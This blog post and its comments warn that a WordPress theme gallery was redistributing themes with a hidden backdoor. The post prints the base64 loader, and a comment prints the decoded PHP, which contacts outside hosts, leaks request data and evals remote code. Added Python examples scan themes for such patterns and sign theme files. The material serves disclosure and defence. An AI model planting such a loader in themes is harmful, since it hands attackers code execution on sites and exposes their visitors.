5ThirtyOne



Do not download WordPress themes distributed by 3rd party sites

Nov 25th 2007
64 Comments

Warning for new and existing WordPress users: DO NOT download WordPress themes from 3rd party "galleries". Identify the original source of the theme and download it directly from the author's website.

As WordPress - both hosted and self-hosted - continues to enjoy explosive growth, its exposure to malicious activity and code will increase. Sadly, this applies to both website administrators and their visitors. In August I was disappointed to discover that WordPress and Joomla themes were being redistributed with malicious code: code which would track your visitors or serve random ads. Since being exposed, the offending website has been taken down. Unfortunately, similar theme galleries have appeared with the same intent: to redistribute themes with malicious code.

WP Sphere is distributing WordPress themes with malicious code

Alistair recently tipped me off to another WordPress gallery distributing themes that include malicious code and modifications. The tip from Alistair actually began as a support email:

I have one question about the encoded stuff I saw in the header, [...]

@eval(@base64_decode('aWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3Q\
jY3MzVBQkMzMDkxNiA9IEBmc29ja29wZW4oInd3dy53cHNzci5jb20i\
LCA4MCwgJFIzMkQwMDA3MEQ0RkZCQ0NFMkZDNjY5QkJBODEyRDRDMiw\
gJFI1RjUyNUY1QjM5OERBREQ3Q0YwNzg0QkQ0MDYyOThFMywgMykpICR\
SNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3Bzc3I\
iOyBlbHNlaWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQkMzMD\
kxNiA9IEBmc29ja29wZW4oInd3dy53cHNuYy5jb20iLCA4MCwgJFIzMk\
QwMDA3MEQ0RkZCQ0NFMkZDNjY5QkJBODEyRDRDMiwgJFI1RjUyNUY1Qj\
M5OERBREQ3Q0YwNzg0QkQ0MDYyOThFMywgMykpICRSNTBGNUY5QzgwRj\
EyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3BzbmMiOyBlbHNlICRSNT\
BGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3BzbmMyIj\
sgQGV2YWwoJyRSMTRBRjFCRTlFRTI2QTkwOTIxRTY0QTgyRTc4MzY3OT\
cgPSAxOycpOyBpZigkUjE0QUYxQkU5RUUyNkE5MDkyMUU2NEE4MkU3OD\
M2Nzk3IEFORCBpbmlfZ2V0KCdhbGxvd191cmxfZm9wZW4nKSkgeyAgJF\
JEM0ZFOUMxMEE4MDhBNTRFQTJBM0RCRDlFNjA1QjY5NiA9ICIxIjsgIC\
RSNkU0RjE0QjMzNTI0M0JFNjU2QzY1RTNFRDlFMUIxMTUgPSAiaHR0cD\
ovL3d3dy4kUjUwRjVGOUM4MEYxMkZGQUU4QjI0MDA1MjhFODFCMzRFLm\
NvbS93JFJEM0ZFOUMxMEE4MDhBNTRFQTJBM0RCRDlFNjA1QjY5Ni5waH\
A/dXJsPSIuIHVybGVuY29kZSgkX1NFUlZFUlsnUkVRVUVTVF9VUkknXS\
kgLiImIi4gImhvc3Q9Ii4gdXJsZW5jb2RlKCRfU0VSVkVSWydIVFRQX0\
hPU1QnXSk7ICAkUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRT\
kwID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCRSNkU0RjE0QjMzNTI0M0JFNj\
U2QzY1RTNFRDlFMUIxMTUpOyAgQGV2YWwoJFIzRTMzRTAxN0NENzZCOU\
I3RTZDNzM2NEZCOTFFMkU5MCk7IH0gZWxzZSB7ICAkUkQzRkU5QzEwQT\
gwOEE1NEVBMkEzREJEOUU2MDVCNjk2ID0gIjAiOyAgJFI2RTRGMTRCMz\
M1MjQzQkU2NTZDNjVFM0VEOUUxQjExNSA9ICJodHRwOi8vd3d3LiRSNT\
BGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUuY29tL3ckUkQzRk\
U5QzEwQTgwOEE1NEVBMkEzREJEOUU2MDVCNjk2LnBocD91cmw9Ii4gdX\
JsZW5jb2RlKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddKSAuIiYiLiAiaG\
9zdD0iLiB1cmxlbmNvZGUoJF9TRVJWRVJbJ0hUVFBfSE9TVCddKTsgIE\
ByZWFkZmlsZSgkUjZFNEYxNEIzMzUyNDNCRTY1NkM2NUUzRUQ5RTFCMT\
E1KTsgfSBmY2xvc2UoJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQk\
MzMDkxNik7'));

After informing Alistair that my themes are not distributed with any code outside the WordPress scope, I discovered that the code in question had been downloaded from WP Sphere. Poking through the other recognized themes on the site, I found that every theme available for download had been repackaged to include the code above, often in plain view in the header.php file. Paul Carroll took the time to break down what the code above exposes users to:

I think the potential for abuse of this script is huge. I see it as a covert channel to set up WordPress-enabled sites as thin zombies. The code being sent back to the server and eval'd could be a mailing script for spam or phishing.

If you have downloaded themes from WP Sphere or any other WordPress theme gallery, exercise caution and inspect the source code: search every PHP file in the theme for eval and base64_decode, since a legitimate theme has almost no reason to execute a decoded string. If you are not comfortable reading code, identify the original author and download the theme directly.
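As an added example, not code from the original post and not a WordPress tool, here is a small Python scanner that does the inspection recommended above: it walks a theme directory, finds eval(base64_decode(...)) wrappers like the one in the header above, decodes the payload and reports which dangerous PHP calls it contains; bare eval/base64_decode-style calls with no decodable payload are reported at lower severity. The sample theme files, the payload and the hostname www.example.invalid are constructed for the demo and are not the real WP Sphere code.

```python
"""Added example, not from the original post: scan a WordPress theme
directory for eval(base64_decode(...)) payloads and decode them."""
import base64
import os
import re
import tempfile

# The wrapper seen in the trojaned header.php: @eval(@base64_decode('...'))
# The base64 may be wrapped over several lines with backslashes, as on the page.
EVAL_B64 = re.compile(
    r"@?eval\s*\(\s*@?base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s\\]+)['\"]\s*\)\s*\)",
    re.IGNORECASE,
)
# Obfuscation/execution primitives worth a look even without a decodable payload.
SUSPICIOUS = re.compile(
    r"\b(eval|base64_decode|gzinflate|str_rot13|create_function)\s*\(", re.IGNORECASE
)
# Calls that, inside a decoded payload, mean beaconing, remote code loading or injection.
DANGEROUS = ("fsockopen", "file_get_contents", "readfile", "curl_exec", "eval",
             "system", "shell_exec", "passthru", "$_SERVER")


def decode_payload(b64: str) -> str:
    """Strip line wrapping and decode; undecodable input is reported, not crashed on."""
    cleaned = re.sub(r"[\s\\]", "", b64)
    try:
        return base64.b64decode(cleaned, validate=True).decode("latin-1")
    except ValueError:
        return "<undecodable>"


def _line(src: str, pos: int) -> int:
    return src.count("\n", 0, pos) + 1


def scan_source(src: str, path: str) -> list:
    """Return findings (dicts) for one PHP source string."""
    findings, covered = [], []
    for m in EVAL_B64.finditer(src):
        covered.append((m.start(), m.end()))
        decoded = decode_payload(m.group(1))
        findings.append({
            "file": path, "line": _line(src, m.start()), "severity": "high",
            "calls": [k for k in DANGEROUS if k in decoded], "decoded": decoded,
        })
    for m in SUSPICIOUS.finditer(src):
        if any(a <= m.start() < b for a, b in covered):
            continue  # already reported as part of a decoded wrapper
        findings.append({
            "file": path, "line": _line(src, m.start()), "severity": "medium",
            "calls": [m.group(1).lower()], "decoded": "",
        })
    return findings


def scan_theme(root: str) -> list:
    """Scan every .php file under a theme directory."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in sorted(files):
            if name.endswith(".php"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    findings.extend(scan_source(fh.read(), path))
    return findings


def build_sample_theme() -> str:
    """Constructed sample: a clean index.php and a header.php repackaged with a
    payload shaped like the one on this page (the hostname is a placeholder)."""
    root = tempfile.mkdtemp(prefix="theme-")
    payload = (
        'if ($s = @fsockopen("www.example.invalid", 80, $errno, $errstr, 3)) {\n'
        '  $u = "http://www.example.invalid/w1.php?url=" . urlencode($_SERVER["REQUEST_URI"]);\n'
        "  @eval(@file_get_contents($u));\n"
        "  fclose($s);\n"
        "}"
    )
    b64 = base64.b64encode(payload.encode()).decode()
    # mimic the backslash-wrapped layout seen in the post
    wrapped = "\\\n".join(b64[i:i + 54] for i in range(0, len(b64), 54))
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write('<?php get_header(); ?>\n<div id="content"><?php the_content(); ?></div>\n')
    with open(os.path.join(root, "header.php"), "w") as fh:
        fh.write("<?php\n@eval(@base64_decode('" + wrapped + "'));\n?>\n<!DOCTYPE html>\n")
    return root


if __name__ == "__main__":
    for f in scan_theme(build_sample_theme()):
        print(f"{f['severity']:6} {f['file']}:{f['line']} calls={f['calls']}")
```

Run it against a real theme with scan_theme("/path/to/wp-content/themes/<theme>") and read the decoded text of every high-severity finding; the calls list only hints at what the payload does, and an attacker can split strings or nest a second layer of encoding, so a medium finding on a bare eval still deserves a manual look.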

How do you police a non-policed platform?

The growth of a platform enlarges the bulls-eye for malicious individuals. How do you protect WordPress users from download sites like WP Sphere or Template Browser? Alistair pointed out that WP Sphere was buying Google AdWords placements to put itself in front of people searching for WordPress themes, right alongside the organic results. How do you fight against such websites?

Only download 5ThirtyOne themes from 5thirtyone.com

I invite WordPress theme authors to make the same recommendation for their visitors - do not download themes from websites other than your own. Additionally, if you are a theme author and discover work being redistributed [without permission] with or without malicious code, contact the offending website host to request that content be taken down.

Unless a 5ThirtyOne theme was officially converted for use on a blogging platform other than WordPress, please download themes from nowhere else other than the links below:

If you've recommended WordPress to friends and family, please take the time to check on them or inform them of the dangers of downloading from free theme galleries.



Comments

  1. It's terrible!
    I strongly recommend you inform the web hosting company to shut down the site.

  2. I have always admired and appreciated your work in regards to WordPress themes and design, and to see that something like this is still going on just completely blows my mind.

    Did they not think they would ever get caught? Thanks for the heads-up. I’m definitely posting a note and linkback on my own site so that any visitors to me will also know about this.

    If nothing else, I can at least help spread the word about the malicious nature of Sphere.

  3. If you decode it, you get (assuming the WordPress comment system eats the following text):

    // Probe two hosts in turn; whichever answers on port 80 within 3 seconds becomes the control host
    if($R37C014DAE5FE4FE5C77B6735ABC30916 = @fsockopen("www.wpssr.com", 80, $R32D00070D4FFBCCE2FC669BBA812D4C2, $R5F525F5B398DADD7CF0784BD406298E3, 3))
        $R50F5F9C80F12FFAE8B2400528E81B34E = "wpssr";
    elseif($R37C014DAE5FE4FE5C77B6735ABC30916 = @fsockopen("www.wpsnc.com", 80, $R32D00070D4FFBCCE2FC669BBA812D4C2, $R5F525F5B398DADD7CF0784BD406298E3, 3))
        $R50F5F9C80F12FFAE8B2400528E81B34E = "wpsnc";
    else
        $R50F5F9C80F12FFAE8B2400528E81B34E = "wpsnc2";
    @eval('$R14AF1BE9EE26A90921E64A82E7836797 = 1;');
    if($R14AF1BE9EE26A90921E64A82E7836797 AND ini_get('allow_url_fopen')) {
        // Remote fopen allowed: fetch PHP from the chosen host (leaking the request URI and Host header) and execute it
        $RD3FE9C10A808A54EA2A3DBD9E605B696 = "1";
        $R6E4F14B335243BE656C65E3ED9E1B115 = "http://www.$R50F5F9C80F12FFAE8B2400528E81B34E.com/w$RD3FE9C10A808A54EA2A3DBD9E605B696.php?url=". urlencode($_SERVER['REQUEST_URI']) ."&". "host=". urlencode($_SERVER['HTTP_HOST']);
        $R3E33E017CD76B9B7E6C7364FB91E2E90 = @file_get_contents($R6E4F14B335243BE656C65E3ED9E1B115);
        @eval($R3E33E017CD76B9B7E6C7364FB91E2E90);
    } else {
        // Otherwise echo whatever the host returns straight into the page (ads, scripts, ...)
        $RD3FE9C10A808A54EA2A3DBD9E605B696 = "0";
        $R6E4F14B335243BE656C65E3ED9E1B115 = "http://www.$R50F5F9C80F12FFAE8B2400528E81B34E.com/w$RD3FE9C10A808A54EA2A3DBD9E605B696.php?url=". urlencode($_SERVER['REQUEST_URI']) ."&". "host=". urlencode($_SERVER['HTTP_HOST']);
        @readfile($R6E4F14B335243BE656C65E3ED9E1B115);
    }
    fclose($R37C014DAE5FE4FE5C77B6735ABC30916);

  4. Maybe it’s time WordPress sets up an official theme repository similar to what they now do with plugins. I’m going to get the discussion going in WP-hackers.

  5. @Ronald: Don’t they already have one? http://themes.wordpress.net/

  6. @Andre: Yes, although they don't really publicize it, and it's more of an official unofficial directory. I'm thinking more along the lines of how they now handle plugins: having a submission process and using WordPress to check the central repository for theme updates (ensuring users download the original theme).

  7. This is one of many reasons I prefer to build my themes from the ground up. Not only does it prevent the above, but it's really the best way to learn the ins and outs of WordPress. And originality is always a huge plus.

  8. Got it to :

    $R50F5F9C80F12FFAE8B2400528E81B34E.com => means ?

    got this in the code : eval(base64_decode('[...]'));

    that give :

    [the same decoded script as in comment 3 above]

  9. Alistair

    Good writeup of last night's flurry of e-mails. Yep, the code uses the PHP Base64 functions to hide the PHP script, which, when run, executes arbitrary instructions on the machine running WordPress — with the WordPress account's level of authority.

    Since WordPress makes it so easy to upload and try a theme (click a thumbnail!) there's very little visibility into this kind of stuff. The uninitiated would normally assume this code was something legitimate and leave it in.

    Nasty stuff indeed. As you point out, any platform with sufficient reach becomes a target. When that platform is Internet-connected, it’s an even more appealing one.

  10. themes.wordpress.net has been dead for months (you can download old themes, but you can’t upload new ones). It will almost certainly be replaced by Matt’s ‘theme marketplace’, in which all themes will be vetted before being made available to both .org users (for free) and .com users (for pay).

    Of course, if you want to be included in that repository you’ll have to licence your themes as GPL, just as plugin authors are banned from uploading non-GPL code to the official plugin site.

  11. devnull

    This goes to prove the further you secure your network the better. The script doesn’t use the WordPress API (which is crap) so people behind proxies are happily safe.

  12. Agreed with your post.

    But this might be a little off-topic. Do you think this theme is using your CSS much?

    http://scarform.com/theme-viewer/index.php?wptheme=B3

  13. About 2 weeks ago there was a security breach on the server I'm hosted at (hosting my own WordPress), and all folders that were chmod'ed to 777 got a .htaccess which redirected all requests to a similar script that opened a connection to some server (not the one above, though) in the same manner... maybe they got hacked too?

  14. Alistair

    So thanks to help from Derek, Matt, and others, this issue’s getting a bit more visibility at GigaOm today (http://gigaom.com/2007/11/26/wordpress-themes-security-problems/) Matt seemed to think it was a pretty serious issue and both he and Derek suggested a theme “clearing house” as a way to check things out prior to them becoming adopted.

  15. Just a little update. Most people in WP-hackers agree that a new theme repository is needed. One has been in the works, but this has sped up the processes.

    We’re currently exploring the possibility of theme validation, so with a little luck, WordPress themes will be safer.

  16. I should have followed up with Derek when I discovered this, but I got a little side tracked.

    Thank you Alistair for getting this information out there.

  17. We’re currently exploring the possibility of theme validation, so with a little luck, WordPress themes will be safer.

    Theme and plugin validation would be awesome. This is something that I touched base on with Alistair during our email exchanges:

    "What can the WordPress community do? I think prevention is as simple as building a backend database; a network of trusted WordPress theme authors who apply for membership. Upon membership approval, each member receives a unique key (similar to an Akismet key) to be included in the header / footer of themes. Once a theme is uploaded to a users server, WordPress checks to verify the validity of the theme source before being activated under the Presentations tab. If a theme is not verifiable, a message will prompt users to investigate further before enabling. "
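The validation scheme proposed in the comment above, as an added example that is not the commenter's code and not part of WordPress, written in Python as a stand-in for the PHP WordPress would actually use: the theme author signs a manifest of file hashes with a per-author key, and the installing site recomputes the manifest before activation and refuses a theme whose files no longer match. The signature file name theme-signature.json, the author id, the key and the theme files are all constructed for the demo.

```python
"""Added example, not from the original post or from WordPress: sign a theme's
file manifest with a per-author key and verify it before activation."""
import hashlib
import hmac
import json
import os
import tempfile

SIGNATURE_FILE = "theme-signature.json"  # hypothetical name chosen for this demo


def theme_manifest(root: str) -> dict:
    """SHA-256 of every file under the theme, keyed by relative path, excluding the signature."""
    manifest = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name == SIGNATURE_FILE:
                continue
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            with open(full, "rb") as fh:
                manifest[rel] = hashlib.sha256(fh.read()).hexdigest()
    return dict(sorted(manifest.items()))


def canonical(manifest: dict) -> bytes:
    """Deterministic byte encoding, so signer and verifier MAC the same bytes."""
    return json.dumps(manifest, sort_keys=True, separators=(",", ":")).encode()


def sign_theme(root: str, author_id: str, key: bytes) -> None:
    """Author side: write the signed manifest into the theme directory."""
    manifest = theme_manifest(root)
    mac = hmac.new(key, canonical(manifest), hashlib.sha256).hexdigest()
    with open(os.path.join(root, SIGNATURE_FILE), "w") as fh:
        json.dump({"author": author_id, "manifest": manifest, "mac": mac}, fh)


def verify_theme(root: str, author_keys: dict) -> str:
    """Site side, run before activation. Returns one of
    'verified', 'unsigned', 'unknown-author', 'tampered'."""
    path = os.path.join(root, SIGNATURE_FILE)
    if not os.path.exists(path):
        return "unsigned"  # the "prompt the user to investigate" case from the comment
    with open(path) as fh:
        sig = json.load(fh)
    key = author_keys.get(sig.get("author"))
    if key is None:
        return "unknown-author"
    # 1. the manifest itself must carry a valid MAC under the claimed author's key
    expected = hmac.new(key, canonical(sig.get("manifest", {})), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, str(sig.get("mac", ""))):
        return "tampered"
    # 2. the files on disk must match the signed manifest exactly (no additions, edits, deletions)
    if theme_manifest(root) != sig["manifest"]:
        return "tampered"
    return "verified"


def build_signed_sample():
    """Constructed sample theme signed by a demo author; returns (root, key)."""
    root = tempfile.mkdtemp(prefix="signed-theme-")
    key = os.urandom(32)
    with open(os.path.join(root, "header.php"), "w") as fh:
        fh.write("<?php get_header(); ?>\n<!DOCTYPE html>\n")
    with open(os.path.join(root, "style.css"), "w") as fh:
        fh.write("/* Theme Name: Demo */\n")
    sign_theme(root, "author-demo", key)
    return root, key


def repackage_with_payload(root: str) -> None:
    """What a rogue gallery does: prepend an obfuscated loader to header.php."""
    path = os.path.join(root, "header.php")
    with open(path) as fh:
        original = fh.read()
    with open(path, "w") as fh:
        fh.write("<?php @eval(@base64_decode('...')); ?>\n" + original)


def strip_signature(root: str) -> None:
    """What a rogue gallery can also do: ship the theme with no signature at all."""
    os.remove(os.path.join(root, SIGNATURE_FILE))


if __name__ == "__main__":
    root, key = build_signed_sample()
    keys = {"author-demo": key}
    print(verify_theme(root, keys))  # verified
    repackage_with_payload(root)
    print(verify_theme(root, keys))  # tampered
```

Two caveats on the design. An HMAC key shared between author and verifying sites means anyone who can verify can also forge, so a real deployment would have the registry hand sites only authors' public keys and use public-key signatures. And since a repackager can simply delete the signature file, the unsigned result has to block activation or prompt the user, exactly as the comment proposes; otherwise the check is worthless.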

  18. Good spotting Derek!

    Thanks for bringing to everyone’s attention. I honestly prefer downloading/buying from the source if possible.

  19. Thanks for your discovery and analysis, Derek.

  20. Jim

    And the next time a WP powered apple-blog is ‘hacked’ don’t give it a second thought… probably just another PR stunt.

  21. One interesting thing is that I translated "Are Hackers Exploiting WordPress Themes?", which was written by Alistair Croll, into Chinese, then pasted it in a WordPress forum, but nobody believed that it is true. Poor! What I want to do is just share something with them and tell them to be careful, but they don't.

    Thanks a lot for your analysis; I have learned something here.

  22. Sean

    An official repo for themes would be helpful. But we already have semi-official repos, and people still download from places like WP Sphere.

    For an official repo to be really effective, Matt & Co. would have to build a theme viewer right into WordPress itself. That would keep most WP newbies from straying past the official stuff.

    That being said, I put together a light weight "anti-spyware" plugin for WordPress. It scans a theme when you activate it for suspicious code. It then alerts the user, and asks them if they really want to activate the theme.

    More @ http://headzoo.com/wp-anti-wares

  23. I’ve downloaded themes from http://rock-kitty.net/ which have that same type of code.

    I even e-mailed the site owner asking for “clean” copies of the files, but I never got a reply…

    I've done some research on that type of code, and it seems a "legitimate" way of encrypting information, but why use it on a WordPress theme?

  24. I know, there's no point in using it on a WordPress theme, but it also affects the design as well.

    So by removing that, the design fooks up. Therefore people who don't know how to get around it, to have a link back to the proper theme owner and their text, just leave it in there and don't touch it. Meaning the asshole who used this code to distribute these themes and call them their own is lame, and can advertise their sites more.

  25. My Hawaiian blog http://www.hawaiib.com was flagged by Google because of one of the themes I used! Well, I removed the theme and hope they will remove the flag.

    If you go to Google and type in hawaiib you will see something like "this site might harm your computer".

    WTF! :)

    I hate those people that play around with the code. Luckily I noticed where the problem is, but it was too late!

  26. Thanks to this post I was able to identify some bad coding in my theme. Thanks so much for informing us about this.

  27. It's nasty code - without getting into specifics, it will try to execute a file loaded from another server - which allows the other person to do ANYTHING on your site. And if that doesn't work, it will try to display a file from the other site (which of course could be JavaScript cross-site scripting code or you-know-what-kind of ads).

  28. Well, it's true that the WordPress theme-making community is getting bigger and bigger, and anything that grows so rapidly is going to have its flaws. The main reason behind this encrypted code is theme sponsoring. Sponsoring? Well, as a WP theme designer myself, I've had a few sponsors for my WordPress themes.

    Many designers make WordPress themes just to get sponsors. I've seen many people make only one theme, change the colors and the header, call it a new theme (so they say) and get sponsors. The average sponsor link is worth $30-40, and a sponsored theme has 3-4 such links, making an average revenue of $150 per theme.

    So I haven't explained the reason yet. Well, the two main conditions a sponsor requires for a theme to be sponsored are:

    1: Encrypted footers
    2: Heavy promotion

    Encrypted footers:
    As you may have read (or, I must say, definitely have read) in this informative article, most new WordPress themes contain such encrypted code. What is behind it is links. Yes, in most cases, and I am not justifying the acts of the people described in the article above, but I am saying that this encrypted code hides sponsored links which the sponsors have paid for. So why do people encrypt the footers? Well, if you see someone honest using a free theme, they don't remove the footer link, as they know it's someone's hard work, but most people remove the links in the footer and take the credit themselves. So in a nutshell it's basically done for sponsoring.

    And as said in the article, you should download themes from the theme makers' sites, or at least from a reputable theme gallery.

    Have a nice day.
    Ace.
